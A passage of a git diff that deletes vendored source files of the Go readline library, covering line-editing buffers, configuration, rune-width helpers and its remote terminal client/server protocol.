'A': - char = CharLineStart - case 'E': - char = CharLineEnd - case 'R': - char = CharBckSearch - case 'S': - char = CharFwdSearch - } - } else if r.altKey { - switch char { - case VK_BACK: - char = CharBackspace - } - return r.writeEsc(buf, char) - } - return r.write(buf, char) -} - -func (r *RawReader) writeEsc(b []byte, char rune) (int, error) { - b[0] = '\033' - n := copy(b[1:], []byte(string(char))) - return n + 1, nil -} - -func (r *RawReader) write(b []byte, char rune) (int, error) { - n := copy(b, []byte(string(char))) - return n, nil -} - -func (r *RawReader) Close() error { - return nil -} diff --git a/vendor/github.com/chzyer/readline/readline.go b/vendor/github.com/chzyer/readline/readline.go deleted file mode 100644 index b0242f77..00000000 --- a/vendor/github.com/chzyer/readline/readline.go +++ /dev/null @@ -1,288 +0,0 @@ -// Readline is a pure go implementation for GNU-Readline kind library. -// -// example: -// rl, err := readline.New("> ") -// if err != nil { -// panic(err) -// } -// defer rl.Close() -// -// for { -// line, err := rl.Readline() -// if err != nil { // io.EOF -// break -// } -// println(line) -// } -// -package readline - -import "io" - -type Instance struct { - Config *Config - Terminal *Terminal - Operation *Operation -} - -type Config struct { - // prompt supports ANSI escape sequence, so we can color some characters even in windows - Prompt string - - // readline will persist historys to file where HistoryFile specified - HistoryFile string - // specify the max length of historys, it's 500 by default, set it to -1 to disable history - HistoryLimit int - DisableAutoSaveHistory bool - // enable case-insensitive history searching - HistorySearchFold bool - - // AutoCompleter will called once user press TAB - AutoComplete AutoCompleter - - // Any key press will pass to Listener - // NOTE: Listener will be triggered by (nil, 0, 0) immediately - Listener Listener - - // If VimMode is true, readline will in vim.insert mode by default - VimMode bool - - InterruptPrompt string - EOFPrompt string - - FuncGetWidth func() int - - Stdin io.Reader - Stdout io.Writer - Stderr io.Writer - - EnableMask bool - MaskRune rune - - // erase the editing line after user submited it - // it use in IM usually. 
- UniqueEditLine bool - - // filter input runes (may be used to disable CtrlZ or for translating some keys to different actions) - // -> output = new (translated) rune and true/false if continue with processing this one - FuncFilterInputRune func(rune) (rune, bool) - - // force use interactive even stdout is not a tty - FuncIsTerminal func() bool - FuncMakeRaw func() error - FuncExitRaw func() error - FuncOnWidthChanged func(func()) - ForceUseInteractive bool - - // private fields - inited bool - opHistory *opHistory - opSearch *opSearch -} - -func (c *Config) useInteractive() bool { - if c.ForceUseInteractive { - return true - } - return c.FuncIsTerminal() -} - -func (c *Config) Init() error { - if c.inited { - return nil - } - c.inited = true - if c.Stdin == nil { - c.Stdin = NewCancelableStdin(Stdin) - } - if c.Stdout == nil { - c.Stdout = Stdout - } - if c.Stderr == nil { - c.Stderr = Stderr - } - if c.HistoryLimit == 0 { - c.HistoryLimit = 500 - } - - if c.InterruptPrompt == "" { - c.InterruptPrompt = "^C" - } else if c.InterruptPrompt == "\n" { - c.InterruptPrompt = "" - } - if c.EOFPrompt == "" { - c.EOFPrompt = "^D" - } else if c.EOFPrompt == "\n" { - c.EOFPrompt = "" - } - - if c.AutoComplete == nil { - c.AutoComplete = &TabCompleter{} - } - if c.FuncGetWidth == nil { - c.FuncGetWidth = GetScreenWidth - } - if c.FuncIsTerminal == nil { - c.FuncIsTerminal = DefaultIsTerminal - } - rm := new(RawMode) - if c.FuncMakeRaw == nil { - c.FuncMakeRaw = rm.Enter - } - if c.FuncExitRaw == nil { - c.FuncExitRaw = rm.Exit - } - if c.FuncOnWidthChanged == nil { - c.FuncOnWidthChanged = DefaultOnWidthChanged - } - - return nil -} - -func (c Config) Clone() *Config { - c.opHistory = nil - c.opSearch = nil - return &c -} - -func (c *Config) SetListener(f func(line []rune, pos int, key rune) (newLine []rune, newPos int, ok bool)) { - c.Listener = FuncListener(f) -} - -func NewEx(cfg *Config) (*Instance, error) { - t, err := NewTerminal(cfg) - if err != nil { - return nil, err - } - rl := t.Readline() - return &Instance{ - Config: cfg, - Terminal: t, - Operation: rl, - }, nil -} - -func New(prompt string) (*Instance, error) { - return NewEx(&Config{Prompt: prompt}) -} - -func (i *Instance) ResetHistory() { - i.Operation.ResetHistory() -} - -func (i *Instance) SetPrompt(s string) { - i.Operation.SetPrompt(s) -} - -func (i *Instance) SetMaskRune(r rune) { - i.Operation.SetMaskRune(r) -} - -// change history persistence in runtime -func (i *Instance) SetHistoryPath(p string) { - i.Operation.SetHistoryPath(p) -} - -// readline will refresh automatic when write through Stdout() -func (i *Instance) Stdout() io.Writer { - return i.Operation.Stdout() -} - -// readline will refresh automatic when write through Stdout() -func (i *Instance) Stderr() io.Writer { - return i.Operation.Stderr() -} - -// switch VimMode in runtime -func (i *Instance) SetVimMode(on bool) { - i.Operation.SetVimMode(on) -} - -func (i *Instance) IsVimMode() bool { - return i.Operation.IsEnableVimMode() -} - -func (i *Instance) GenPasswordConfig() *Config { - return i.Operation.GenPasswordConfig() -} - -// we can generate a config by `i.GenPasswordConfig()` -func (i *Instance) ReadPasswordWithConfig(cfg *Config) ([]byte, error) { - return i.Operation.PasswordWithConfig(cfg) -} - -func (i *Instance) ReadPasswordEx(prompt string, l Listener) ([]byte, error) { - return i.Operation.PasswordEx(prompt, l) -} - -func (i *Instance) ReadPassword(prompt string) ([]byte, error) { - return i.Operation.Password(prompt) -} - -type Result struct { - 
Line string - Error error -} - -func (l *Result) CanContinue() bool { - return len(l.Line) != 0 && l.Error == ErrInterrupt -} - -func (l *Result) CanBreak() bool { - return !l.CanContinue() && l.Error != nil -} - -func (i *Instance) Line() *Result { - ret, err := i.Readline() - return &Result{ret, err} -} - -// err is one of (nil, io.EOF, readline.ErrInterrupt) -func (i *Instance) Readline() (string, error) { - return i.Operation.String() -} - -func (i *Instance) ReadlineWithDefault(what string) (string, error) { - i.Operation.SetBuffer(what) - return i.Operation.String() -} - -func (i *Instance) SaveHistory(content string) error { - return i.Operation.SaveHistory(content) -} - -// same as readline -func (i *Instance) ReadSlice() ([]byte, error) { - return i.Operation.Slice() -} - -// we must make sure that call Close() before process exit. -func (i *Instance) Close() error { - if err := i.Terminal.Close(); err != nil { - return err - } - i.Operation.Close() - return nil -} -func (i *Instance) Clean() { - i.Operation.Clean() -} - -func (i *Instance) Write(b []byte) (int, error) { - return i.Stdout().Write(b) -} - -func (i *Instance) SetConfig(cfg *Config) *Config { - if i.Config == cfg { - return cfg - } - old := i.Config - i.Config = cfg - i.Operation.SetConfig(cfg) - i.Terminal.SetConfig(cfg) - return old -} - -func (i *Instance) Refresh() { - i.Operation.Refresh() -} diff --git a/vendor/github.com/chzyer/readline/remote.go b/vendor/github.com/chzyer/readline/remote.go deleted file mode 100644 index db77ae8c..00000000 --- a/vendor/github.com/chzyer/readline/remote.go +++ /dev/null @@ -1,474 +0,0 @@ -package readline - -import ( - "bufio" - "bytes" - "encoding/binary" - "fmt" - "io" - "net" - "os" - "sync" - "sync/atomic" -) - -type MsgType int16 - -const ( - T_DATA = MsgType(iota) - T_WIDTH - T_WIDTH_REPORT - T_ISTTY_REPORT - T_RAW - T_ERAW // exit raw - T_EOF -) - -type RemoteSvr struct { - eof int32 - closed int32 - width int32 - reciveChan chan struct{} - writeChan chan *writeCtx - conn net.Conn - isTerminal bool - funcWidthChan func() - stopChan chan struct{} - - dataBufM sync.Mutex - dataBuf bytes.Buffer -} - -type writeReply struct { - n int - err error -} - -type writeCtx struct { - msg *Message - reply chan *writeReply -} - -func newWriteCtx(msg *Message) *writeCtx { - return &writeCtx{ - msg: msg, - reply: make(chan *writeReply), - } -} - -func NewRemoteSvr(conn net.Conn) (*RemoteSvr, error) { - rs := &RemoteSvr{ - width: -1, - conn: conn, - writeChan: make(chan *writeCtx), - reciveChan: make(chan struct{}), - stopChan: make(chan struct{}), - } - buf := bufio.NewReader(rs.conn) - - if err := rs.init(buf); err != nil { - return nil, err - } - - go rs.readLoop(buf) - go rs.writeLoop() - return rs, nil -} - -func (r *RemoteSvr) init(buf *bufio.Reader) error { - m, err := ReadMessage(buf) - if err != nil { - return err - } - // receive isTerminal - if m.Type != T_ISTTY_REPORT { - return fmt.Errorf("unexpected init message") - } - r.GotIsTerminal(m.Data) - - // receive width - m, err = ReadMessage(buf) - if err != nil { - return err - } - if m.Type != T_WIDTH_REPORT { - return fmt.Errorf("unexpected init message") - } - r.GotReportWidth(m.Data) - - return nil -} - -func (r *RemoteSvr) HandleConfig(cfg *Config) { - cfg.Stderr = r - cfg.Stdout = r - cfg.Stdin = r - cfg.FuncExitRaw = r.ExitRawMode - cfg.FuncIsTerminal = r.IsTerminal - cfg.FuncMakeRaw = r.EnterRawMode - cfg.FuncExitRaw = r.ExitRawMode - cfg.FuncGetWidth = r.GetWidth - cfg.FuncOnWidthChanged = func(f func()) { - 
r.funcWidthChan = f - } -} - -func (r *RemoteSvr) IsTerminal() bool { - return r.isTerminal -} - -func (r *RemoteSvr) checkEOF() error { - if atomic.LoadInt32(&r.eof) == 1 { - return io.EOF - } - return nil -} - -func (r *RemoteSvr) Read(b []byte) (int, error) { - r.dataBufM.Lock() - n, err := r.dataBuf.Read(b) - r.dataBufM.Unlock() - if n == 0 { - if err := r.checkEOF(); err != nil { - return 0, err - } - } - - if n == 0 && err == io.EOF { - <-r.reciveChan - r.dataBufM.Lock() - n, err = r.dataBuf.Read(b) - r.dataBufM.Unlock() - } - if n == 0 { - if err := r.checkEOF(); err != nil { - return 0, err - } - } - - return n, err -} - -func (r *RemoteSvr) writeMsg(m *Message) error { - ctx := newWriteCtx(m) - r.writeChan <- ctx - reply := <-ctx.reply - return reply.err -} - -func (r *RemoteSvr) Write(b []byte) (int, error) { - ctx := newWriteCtx(NewMessage(T_DATA, b)) - r.writeChan <- ctx - reply := <-ctx.reply - return reply.n, reply.err -} - -func (r *RemoteSvr) EnterRawMode() error { - return r.writeMsg(NewMessage(T_RAW, nil)) -} - -func (r *RemoteSvr) ExitRawMode() error { - return r.writeMsg(NewMessage(T_ERAW, nil)) -} - -func (r *RemoteSvr) writeLoop() { - defer r.Close() - -loop: - for { - select { - case ctx, ok := <-r.writeChan: - if !ok { - break - } - n, err := ctx.msg.WriteTo(r.conn) - ctx.reply <- &writeReply{n, err} - case <-r.stopChan: - break loop - } - } -} - -func (r *RemoteSvr) Close() { - if atomic.CompareAndSwapInt32(&r.closed, 0, 1) { - close(r.stopChan) - r.conn.Close() - } -} - -func (r *RemoteSvr) readLoop(buf *bufio.Reader) { - defer r.Close() - for { - m, err := ReadMessage(buf) - if err != nil { - break - } - switch m.Type { - case T_EOF: - atomic.StoreInt32(&r.eof, 1) - select { - case r.reciveChan <- struct{}{}: - default: - } - case T_DATA: - r.dataBufM.Lock() - r.dataBuf.Write(m.Data) - r.dataBufM.Unlock() - select { - case r.reciveChan <- struct{}{}: - default: - } - case T_WIDTH_REPORT: - r.GotReportWidth(m.Data) - case T_ISTTY_REPORT: - r.GotIsTerminal(m.Data) - } - } -} - -func (r *RemoteSvr) GotIsTerminal(data []byte) { - if binary.BigEndian.Uint16(data) == 0 { - r.isTerminal = false - } else { - r.isTerminal = true - } -} - -func (r *RemoteSvr) GotReportWidth(data []byte) { - atomic.StoreInt32(&r.width, int32(binary.BigEndian.Uint16(data))) - if r.funcWidthChan != nil { - r.funcWidthChan() - } -} - -func (r *RemoteSvr) GetWidth() int { - return int(atomic.LoadInt32(&r.width)) -} - -// ----------------------------------------------------------------------------- - -type Message struct { - Type MsgType - Data []byte -} - -func ReadMessage(r io.Reader) (*Message, error) { - m := new(Message) - var length int32 - if err := binary.Read(r, binary.BigEndian, &length); err != nil { - return nil, err - } - if err := binary.Read(r, binary.BigEndian, &m.Type); err != nil { - return nil, err - } - m.Data = make([]byte, int(length)-2) - if _, err := io.ReadFull(r, m.Data); err != nil { - return nil, err - } - return m, nil -} - -func NewMessage(t MsgType, data []byte) *Message { - return &Message{t, data} -} - -func (m *Message) WriteTo(w io.Writer) (int, error) { - buf := bytes.NewBuffer(make([]byte, 0, len(m.Data)+2+4)) - binary.Write(buf, binary.BigEndian, int32(len(m.Data)+2)) - binary.Write(buf, binary.BigEndian, m.Type) - buf.Write(m.Data) - n, err := buf.WriteTo(w) - return int(n), err -} - -// ----------------------------------------------------------------------------- - -type RemoteCli struct { - conn net.Conn - raw RawMode - receiveChan chan struct{} - inited 
int32 - isTerminal *bool - - data bytes.Buffer - dataM sync.Mutex -} - -func NewRemoteCli(conn net.Conn) (*RemoteCli, error) { - r := &RemoteCli{ - conn: conn, - receiveChan: make(chan struct{}), - } - return r, nil -} - -func (r *RemoteCli) MarkIsTerminal(is bool) { - r.isTerminal = &is -} - -func (r *RemoteCli) init() error { - if !atomic.CompareAndSwapInt32(&r.inited, 0, 1) { - return nil - } - - if err := r.reportIsTerminal(); err != nil { - return err - } - - if err := r.reportWidth(); err != nil { - return err - } - - // register sig for width changed - DefaultOnWidthChanged(func() { - r.reportWidth() - }) - return nil -} - -func (r *RemoteCli) writeMsg(m *Message) error { - r.dataM.Lock() - _, err := m.WriteTo(r.conn) - r.dataM.Unlock() - return err -} - -func (r *RemoteCli) Write(b []byte) (int, error) { - m := NewMessage(T_DATA, b) - r.dataM.Lock() - _, err := m.WriteTo(r.conn) - r.dataM.Unlock() - return len(b), err -} - -func (r *RemoteCli) reportWidth() error { - screenWidth := GetScreenWidth() - data := make([]byte, 2) - binary.BigEndian.PutUint16(data, uint16(screenWidth)) - msg := NewMessage(T_WIDTH_REPORT, data) - - if err := r.writeMsg(msg); err != nil { - return err - } - return nil -} - -func (r *RemoteCli) reportIsTerminal() error { - var isTerminal bool - if r.isTerminal != nil { - isTerminal = *r.isTerminal - } else { - isTerminal = DefaultIsTerminal() - } - data := make([]byte, 2) - if isTerminal { - binary.BigEndian.PutUint16(data, 1) - } else { - binary.BigEndian.PutUint16(data, 0) - } - msg := NewMessage(T_ISTTY_REPORT, data) - if err := r.writeMsg(msg); err != nil { - return err - } - return nil -} - -func (r *RemoteCli) readLoop() { - buf := bufio.NewReader(r.conn) - for { - msg, err := ReadMessage(buf) - if err != nil { - break - } - switch msg.Type { - case T_ERAW: - r.raw.Exit() - case T_RAW: - r.raw.Enter() - case T_DATA: - os.Stdout.Write(msg.Data) - } - } -} - -func (r *RemoteCli) ServeBy(source io.Reader) error { - if err := r.init(); err != nil { - return err - } - - go func() { - defer r.Close() - for { - n, _ := io.Copy(r, source) - if n == 0 { - break - } - } - }() - defer r.raw.Exit() - r.readLoop() - return nil -} - -func (r *RemoteCli) Close() { - r.writeMsg(NewMessage(T_EOF, nil)) -} - -func (r *RemoteCli) Serve() error { - return r.ServeBy(os.Stdin) -} - -func ListenRemote(n, addr string, cfg *Config, h func(*Instance), onListen ...func(net.Listener) error) error { - ln, err := net.Listen(n, addr) - if err != nil { - return err - } - if len(onListen) > 0 { - if err := onListen[0](ln); err != nil { - return err - } - } - for { - conn, err := ln.Accept() - if err != nil { - break - } - go func() { - defer conn.Close() - rl, err := HandleConn(*cfg, conn) - if err != nil { - return - } - h(rl) - }() - } - return nil -} - -func HandleConn(cfg Config, conn net.Conn) (*Instance, error) { - r, err := NewRemoteSvr(conn) - if err != nil { - return nil, err - } - r.HandleConfig(&cfg) - - rl, err := NewEx(&cfg) - if err != nil { - return nil, err - } - return rl, nil -} - -func DialRemote(n, addr string) error { - conn, err := net.Dial(n, addr) - if err != nil { - return err - } - defer conn.Close() - - cli, err := NewRemoteCli(conn) - if err != nil { - return err - } - return cli.Serve() -} diff --git a/vendor/github.com/chzyer/readline/runebuf.go b/vendor/github.com/chzyer/readline/runebuf.go deleted file mode 100644 index 1b2a5d04..00000000 --- a/vendor/github.com/chzyer/readline/runebuf.go +++ /dev/null @@ -1,572 +0,0 @@ -package readline - -import ( - 
"bufio" - "bytes" - "io" - "strings" - "sync" -) - -type runeBufferBck struct { - buf []rune - idx int -} - -type RuneBuffer struct { - buf []rune - idx int - prompt []rune - w io.Writer - - hadClean bool - interactive bool - cfg *Config - - width int - - bck *runeBufferBck - - offset string - - sync.Mutex -} - -func (r *RuneBuffer) OnWidthChange(newWidth int) { - r.Lock() - r.width = newWidth - r.Unlock() -} - -func (r *RuneBuffer) Backup() { - r.Lock() - r.bck = &runeBufferBck{r.buf, r.idx} - r.Unlock() -} - -func (r *RuneBuffer) Restore() { - r.Refresh(func() { - if r.bck == nil { - return - } - r.buf = r.bck.buf - r.idx = r.bck.idx - }) -} - -func NewRuneBuffer(w io.Writer, prompt string, cfg *Config, width int) *RuneBuffer { - rb := &RuneBuffer{ - w: w, - interactive: cfg.useInteractive(), - cfg: cfg, - width: width, - } - rb.SetPrompt(prompt) - return rb -} - -func (r *RuneBuffer) SetConfig(cfg *Config) { - r.Lock() - r.cfg = cfg - r.interactive = cfg.useInteractive() - r.Unlock() -} - -func (r *RuneBuffer) SetMask(m rune) { - r.Lock() - r.cfg.MaskRune = m - r.Unlock() -} - -func (r *RuneBuffer) CurrentWidth(x int) int { - r.Lock() - defer r.Unlock() - return runes.WidthAll(r.buf[:x]) -} - -func (r *RuneBuffer) PromptLen() int { - r.Lock() - width := r.promptLen() - r.Unlock() - return width -} - -func (r *RuneBuffer) promptLen() int { - return runes.WidthAll(runes.ColorFilter(r.prompt)) -} - -func (r *RuneBuffer) RuneSlice(i int) []rune { - r.Lock() - defer r.Unlock() - - if i > 0 { - rs := make([]rune, i) - copy(rs, r.buf[r.idx:r.idx+i]) - return rs - } - rs := make([]rune, -i) - copy(rs, r.buf[r.idx+i:r.idx]) - return rs -} - -func (r *RuneBuffer) Runes() []rune { - r.Lock() - newr := make([]rune, len(r.buf)) - copy(newr, r.buf) - r.Unlock() - return newr -} - -func (r *RuneBuffer) Pos() int { - r.Lock() - defer r.Unlock() - return r.idx -} - -func (r *RuneBuffer) Len() int { - r.Lock() - defer r.Unlock() - return len(r.buf) -} - -func (r *RuneBuffer) MoveToLineStart() { - r.Refresh(func() { - if r.idx == 0 { - return - } - r.idx = 0 - }) -} - -func (r *RuneBuffer) MoveBackward() { - r.Refresh(func() { - if r.idx == 0 { - return - } - r.idx-- - }) -} - -func (r *RuneBuffer) WriteString(s string) { - r.WriteRunes([]rune(s)) -} - -func (r *RuneBuffer) WriteRune(s rune) { - r.WriteRunes([]rune{s}) -} - -func (r *RuneBuffer) WriteRunes(s []rune) { - r.Refresh(func() { - tail := append(s, r.buf[r.idx:]...) - r.buf = append(r.buf[:r.idx], tail...) - r.idx += len(s) - }) -} - -func (r *RuneBuffer) MoveForward() { - r.Refresh(func() { - if r.idx == len(r.buf) { - return - } - r.idx++ - }) -} - -func (r *RuneBuffer) IsCursorInEnd() bool { - r.Lock() - defer r.Unlock() - return r.idx == len(r.buf) -} - -func (r *RuneBuffer) Replace(ch rune) { - r.Refresh(func() { - r.buf[r.idx] = ch - }) -} - -func (r *RuneBuffer) Erase() { - r.Refresh(func() { - r.idx = 0 - r.buf = r.buf[:0] - }) -} - -func (r *RuneBuffer) Delete() (success bool) { - r.Refresh(func() { - if r.idx == len(r.buf) { - return - } - r.buf = append(r.buf[:r.idx], r.buf[r.idx+1:]...) - success = true - }) - return -} - -func (r *RuneBuffer) DeleteWord() { - if r.idx == len(r.buf) { - return - } - init := r.idx - for init < len(r.buf) && IsWordBreak(r.buf[init]) { - init++ - } - for i := init + 1; i < len(r.buf); i++ { - if !IsWordBreak(r.buf[i]) && IsWordBreak(r.buf[i-1]) { - r.Refresh(func() { - r.buf = append(r.buf[:r.idx], r.buf[i-1:]...) 
- }) - return - } - } - r.Kill() -} - -func (r *RuneBuffer) MoveToPrevWord() (success bool) { - r.Refresh(func() { - if r.idx == 0 { - return - } - - for i := r.idx - 1; i > 0; i-- { - if !IsWordBreak(r.buf[i]) && IsWordBreak(r.buf[i-1]) { - r.idx = i - success = true - return - } - } - r.idx = 0 - success = true - }) - return -} - -func (r *RuneBuffer) KillFront() { - r.Refresh(func() { - if r.idx == 0 { - return - } - - length := len(r.buf) - r.idx - copy(r.buf[:length], r.buf[r.idx:]) - r.idx = 0 - r.buf = r.buf[:length] - }) -} - -func (r *RuneBuffer) Kill() { - r.Refresh(func() { - r.buf = r.buf[:r.idx] - }) -} - -func (r *RuneBuffer) Transpose() { - r.Refresh(func() { - if len(r.buf) == 1 { - r.idx++ - } - - if len(r.buf) < 2 { - return - } - - if r.idx == 0 { - r.idx = 1 - } else if r.idx >= len(r.buf) { - r.idx = len(r.buf) - 1 - } - r.buf[r.idx], r.buf[r.idx-1] = r.buf[r.idx-1], r.buf[r.idx] - r.idx++ - }) -} - -func (r *RuneBuffer) MoveToNextWord() { - r.Refresh(func() { - for i := r.idx + 1; i < len(r.buf); i++ { - if !IsWordBreak(r.buf[i]) && IsWordBreak(r.buf[i-1]) { - r.idx = i - return - } - } - - r.idx = len(r.buf) - }) -} - -func (r *RuneBuffer) MoveToEndWord() { - r.Refresh(func() { - // already at the end, so do nothing - if r.idx == len(r.buf) { - return - } - // if we are at the end of a word already, go to next - if !IsWordBreak(r.buf[r.idx]) && IsWordBreak(r.buf[r.idx+1]) { - r.idx++ - } - - // keep going until at the end of a word - for i := r.idx + 1; i < len(r.buf); i++ { - if IsWordBreak(r.buf[i]) && !IsWordBreak(r.buf[i-1]) { - r.idx = i - 1 - return - } - } - r.idx = len(r.buf) - }) -} - -func (r *RuneBuffer) BackEscapeWord() { - r.Refresh(func() { - if r.idx == 0 { - return - } - for i := r.idx - 1; i > 0; i-- { - if !IsWordBreak(r.buf[i]) && IsWordBreak(r.buf[i-1]) { - r.buf = append(r.buf[:i], r.buf[r.idx:]...) - r.idx = i - return - } - } - - r.buf = r.buf[:0] - r.idx = 0 - }) -} - -func (r *RuneBuffer) Backspace() { - r.Refresh(func() { - if r.idx == 0 { - return - } - - r.idx-- - r.buf = append(r.buf[:r.idx], r.buf[r.idx+1:]...) 
- }) -} - -func (r *RuneBuffer) MoveToLineEnd() { - r.Refresh(func() { - if r.idx == len(r.buf) { - return - } - - r.idx = len(r.buf) - }) -} - -func (r *RuneBuffer) LineCount(width int) int { - if width == -1 { - width = r.width - } - return LineCount(width, - runes.WidthAll(r.buf)+r.PromptLen()) -} - -func (r *RuneBuffer) MoveTo(ch rune, prevChar, reverse bool) (success bool) { - r.Refresh(func() { - if reverse { - for i := r.idx - 1; i >= 0; i-- { - if r.buf[i] == ch { - r.idx = i - if prevChar { - r.idx++ - } - success = true - return - } - } - return - } - for i := r.idx + 1; i < len(r.buf); i++ { - if r.buf[i] == ch { - r.idx = i - if prevChar { - r.idx-- - } - success = true - return - } - } - }) - return -} - -func (r *RuneBuffer) isInLineEdge() bool { - if isWindows { - return false - } - sp := r.getSplitByLine(r.buf) - return len(sp[len(sp)-1]) == 0 -} - -func (r *RuneBuffer) getSplitByLine(rs []rune) []string { - return SplitByLine(r.promptLen(), r.width, rs) -} - -func (r *RuneBuffer) IdxLine(width int) int { - r.Lock() - defer r.Unlock() - return r.idxLine(width) -} - -func (r *RuneBuffer) idxLine(width int) int { - if width == 0 { - return 0 - } - sp := r.getSplitByLine(r.buf[:r.idx]) - return len(sp) - 1 -} - -func (r *RuneBuffer) CursorLineCount() int { - return r.LineCount(r.width) - r.IdxLine(r.width) -} - -func (r *RuneBuffer) Refresh(f func()) { - r.Lock() - defer r.Unlock() - - if !r.interactive { - if f != nil { - f() - } - return - } - - r.clean() - if f != nil { - f() - } - r.print() -} - -func (r *RuneBuffer) SetOffset(offset string) { - r.Lock() - r.offset = offset - r.Unlock() -} - -func (r *RuneBuffer) print() { - r.w.Write(r.output()) - r.hadClean = false -} - -func (r *RuneBuffer) output() []byte { - buf := bytes.NewBuffer(nil) - buf.WriteString(string(r.prompt)) - if r.cfg.EnableMask && len(r.buf) > 0 { - buf.Write([]byte(strings.Repeat(string(r.cfg.MaskRune), len(r.buf)-1))) - if r.buf[len(r.buf)-1] == '\n' { - buf.Write([]byte{'\n'}) - } else { - buf.Write([]byte(string(r.cfg.MaskRune))) - } - if len(r.buf) > r.idx { - buf.Write(runes.Backspace(r.buf[r.idx:])) - } - - } else { - for idx := range r.buf { - if r.buf[idx] == '\t' { - buf.WriteString(strings.Repeat(" ", TabWidth)) - } else { - buf.WriteRune(r.buf[idx]) - } - } - if r.isInLineEdge() { - buf.Write([]byte(" \b")) - } - } - - if len(r.buf) > r.idx { - buf.Write(runes.Backspace(r.buf[r.idx:])) - } - return buf.Bytes() -} - -func (r *RuneBuffer) Reset() []rune { - ret := runes.Copy(r.buf) - r.buf = r.buf[:0] - r.idx = 0 - return ret -} - -func (r *RuneBuffer) calWidth(m int) int { - if m > 0 { - return runes.WidthAll(r.buf[r.idx : r.idx+m]) - } - return runes.WidthAll(r.buf[r.idx+m : r.idx]) -} - -func (r *RuneBuffer) SetStyle(start, end int, style string) { - if end < start { - panic("end < start") - } - - // goto start - move := start - r.idx - if move > 0 { - r.w.Write([]byte(string(r.buf[r.idx : r.idx+move]))) - } else { - r.w.Write(bytes.Repeat([]byte("\b"), r.calWidth(move))) - } - r.w.Write([]byte("\033[" + style + "m")) - r.w.Write([]byte(string(r.buf[start:end]))) - r.w.Write([]byte("\033[0m")) - // TODO: move back -} - -func (r *RuneBuffer) SetWithIdx(idx int, buf []rune) { - r.Refresh(func() { - r.buf = buf - r.idx = idx - }) -} - -func (r *RuneBuffer) Set(buf []rune) { - r.SetWithIdx(len(buf), buf) -} - -func (r *RuneBuffer) SetPrompt(prompt string) { - r.Lock() - r.prompt = []rune(prompt) - r.Unlock() -} - -func (r *RuneBuffer) cleanOutput(w io.Writer, idxLine int) { - buf := 
bufio.NewWriter(w) - - if r.width == 0 { - buf.WriteString(strings.Repeat("\r\b", len(r.buf)+r.promptLen())) - buf.Write([]byte("\033[J")) - } else { - buf.Write([]byte("\033[J")) // just like ^k :) - if idxLine == 0 { - buf.WriteString("\033[2K") - buf.WriteString("\r") - } else { - for i := 0; i < idxLine; i++ { - io.WriteString(buf, "\033[2K\r\033[A") - } - io.WriteString(buf, "\033[2K\r") - } - } - buf.Flush() - return -} - -func (r *RuneBuffer) Clean() { - r.Lock() - r.clean() - r.Unlock() -} - -func (r *RuneBuffer) clean() { - r.cleanWithIdxLine(r.idxLine(r.width)) -} - -func (r *RuneBuffer) cleanWithIdxLine(idxLine int) { - if r.hadClean || !r.interactive { - return - } - r.hadClean = true - r.cleanOutput(r.w, idxLine) -} diff --git a/vendor/github.com/chzyer/readline/runes.go b/vendor/github.com/chzyer/readline/runes.go deleted file mode 100644 index a669bc48..00000000 --- a/vendor/github.com/chzyer/readline/runes.go +++ /dev/null @@ -1,223 +0,0 @@ -package readline - -import ( - "bytes" - "unicode" - "unicode/utf8" -) - -var runes = Runes{} -var TabWidth = 4 - -type Runes struct{} - -func (Runes) EqualRune(a, b rune, fold bool) bool { - if a == b { - return true - } - if !fold { - return false - } - if a > b { - a, b = b, a - } - if b < utf8.RuneSelf && 'A' <= a && a <= 'Z' { - if b == a+'a'-'A' { - return true - } - } - return false -} - -func (r Runes) EqualRuneFold(a, b rune) bool { - return r.EqualRune(a, b, true) -} - -func (r Runes) EqualFold(a, b []rune) bool { - if len(a) != len(b) { - return false - } - for i := 0; i < len(a); i++ { - if r.EqualRuneFold(a[i], b[i]) { - continue - } - return false - } - - return true -} - -func (Runes) Equal(a, b []rune) bool { - if len(a) != len(b) { - return false - } - for i := 0; i < len(a); i++ { - if a[i] != b[i] { - return false - } - } - return true -} - -func (rs Runes) IndexAllBckEx(r, sub []rune, fold bool) int { - for i := len(r) - len(sub); i >= 0; i-- { - found := true - for j := 0; j < len(sub); j++ { - if !rs.EqualRune(r[i+j], sub[j], fold) { - found = false - break - } - } - if found { - return i - } - } - return -1 -} - -// Search in runes from end to front -func (rs Runes) IndexAllBck(r, sub []rune) int { - return rs.IndexAllBckEx(r, sub, false) -} - -// Search in runes from front to end -func (rs Runes) IndexAll(r, sub []rune) int { - return rs.IndexAllEx(r, sub, false) -} - -func (rs Runes) IndexAllEx(r, sub []rune, fold bool) int { - for i := 0; i < len(r); i++ { - found := true - if len(r[i:]) < len(sub) { - return -1 - } - for j := 0; j < len(sub); j++ { - if !rs.EqualRune(r[i+j], sub[j], fold) { - found = false - break - } - } - if found { - return i - } - } - return -1 -} - -func (Runes) Index(r rune, rs []rune) int { - for i := 0; i < len(rs); i++ { - if rs[i] == r { - return i - } - } - return -1 -} - -func (Runes) ColorFilter(r []rune) []rune { - newr := make([]rune, 0, len(r)) - for pos := 0; pos < len(r); pos++ { - if r[pos] == '\033' && r[pos+1] == '[' { - idx := runes.Index('m', r[pos+2:]) - if idx == -1 { - continue - } - pos += idx + 2 - continue - } - newr = append(newr, r[pos]) - } - return newr -} - -var zeroWidth = []*unicode.RangeTable{ - unicode.Mn, - unicode.Me, - unicode.Cc, - unicode.Cf, -} - -var doubleWidth = []*unicode.RangeTable{ - unicode.Han, - unicode.Hangul, - unicode.Hiragana, - unicode.Katakana, -} - -func (Runes) Width(r rune) int { - if r == '\t' { - return TabWidth - } - if unicode.IsOneOf(zeroWidth, r) { - return 0 - } - if unicode.IsOneOf(doubleWidth, r) { - return 2 - } - return 1 
